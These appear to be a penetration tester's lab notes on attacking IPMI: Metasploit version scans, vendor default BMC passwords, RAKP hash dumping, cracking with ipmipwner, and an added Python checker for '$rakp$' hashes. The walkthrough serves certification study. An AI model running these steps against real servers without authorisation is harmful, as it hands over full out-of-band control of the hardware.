IPMI (623 UDP)

Theory

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state.

Version

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     10.129.42.195    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


msf6 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Default password

Product          Username       Password
Dell iDRAC       root           calvin
HP iLO           Administrator  randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI  ADMIN          ADMIN

Metasploit Wordlists

ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt

Get password

Hashes

Metasploit Dumping Hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cat ipmi.txt
a870af384080000fcb12dffed486b2d2307f417d3261a28f099e9b1b0fe99d1f77f2b940cfba668a123456789abcdefa123456789abcdef140561646d696e:9d0c8a64d4b9cf7482ba54a9056e6b147777e025

I don't know why but hashcat didn't find the password :(

ipmiPwner

Apr 06, 2024 - 05:26:05 (EDT) exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash


[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid                                                  
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
   \_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python

[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497                                                  
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash 
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #
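What the dumped line actually is: in the IPMI 2.0 RAKP exchange the BMC returns an HMAC-SHA1 over the session fields (session IDs, both nonces, BMC GUID, role, username) keyed with the user's password, before the client has proven anything. The `$rakp$<salt>$<hmac>` string written by ipmipwner (and read by hashcat mode 7300) is exactly that salt and digest. The parser and single-candidate check below is an added example, not code from ipmipwner or Metasploit; it assumes the hashcat 7300 field layout and lets you confirm that a dumped hash matches one of the vendor defaults from the table above, or re-verify a crackedHash result, without rerunning a full wordlist.

```python
import hashlib
import hmac
from dataclasses import dataclass


@dataclass
class RakpHash:
    salt: bytes    # RAKP message 2 fields exactly as the BMC signed them
    digest: bytes  # HMAC-SHA1 the BMC computed with the user's password as key

    @property
    def username(self) -> str:
        # Salt layout: SIDm(4) SIDc(4) Rm(16) Rc(16) GUIDc(16) Role(1) ULen(1) UName(ULen)
        ulen = self.salt[57]
        if len(self.salt) != 58 + ulen:
            raise ValueError("salt length does not match embedded username length")
        return self.salt[58:58 + ulen].decode("ascii")

    @property
    def role(self) -> int:
        # Low nibble is the requested privilege level (4 = ADMINISTRATOR)
        return self.salt[56] & 0x0F


def parse_rakp(line: str) -> RakpHash:
    # Accept "$rakp$<salt_hex>$<hmac_hex>", optionally followed by ":<password>" as in crackedHash
    line = line.strip().split(":")[0]
    tag, salt_hex, digest_hex = line.split("$")[1:]
    if tag != "rakp":
        raise ValueError("not a $rakp$ hash")
    h = RakpHash(bytes.fromhex(salt_hex), bytes.fromhex(digest_hex))
    if len(h.digest) != hashlib.sha1().digest_size:
        raise ValueError("expected a 20-byte HMAC-SHA1 digest")
    h.username  # validates the salt layout
    return h


def check_password(h: RakpHash, candidate: str) -> bool:
    # The BMC keyed the HMAC with the plaintext password, so a candidate is verified the same way
    expected = hmac.new(candidate.encode(), h.salt, hashlib.sha1).digest()
    return hmac.compare_digest(expected, h.digest)


def make_rakp_line(salt: bytes, password: str) -> str:
    # Builds a $rakp$ line the way a BMC would; used only to construct test data offline
    digest = hmac.new(password.encode(), salt, hashlib.sha1).digest()
    return f"$rakp${salt.hex()}${digest.hex()}"


# Hash line taken from the ipmipwner output above
PAGE_HASH = "$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a"
```

Feeding `parse_rakp(PAGE_HASH)` the Dell/Supermicro defaults from the table is a two-line loop over `check_password`; the same parser also accepts the `hash:password` lines ipmipwner writes to crackedHash.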
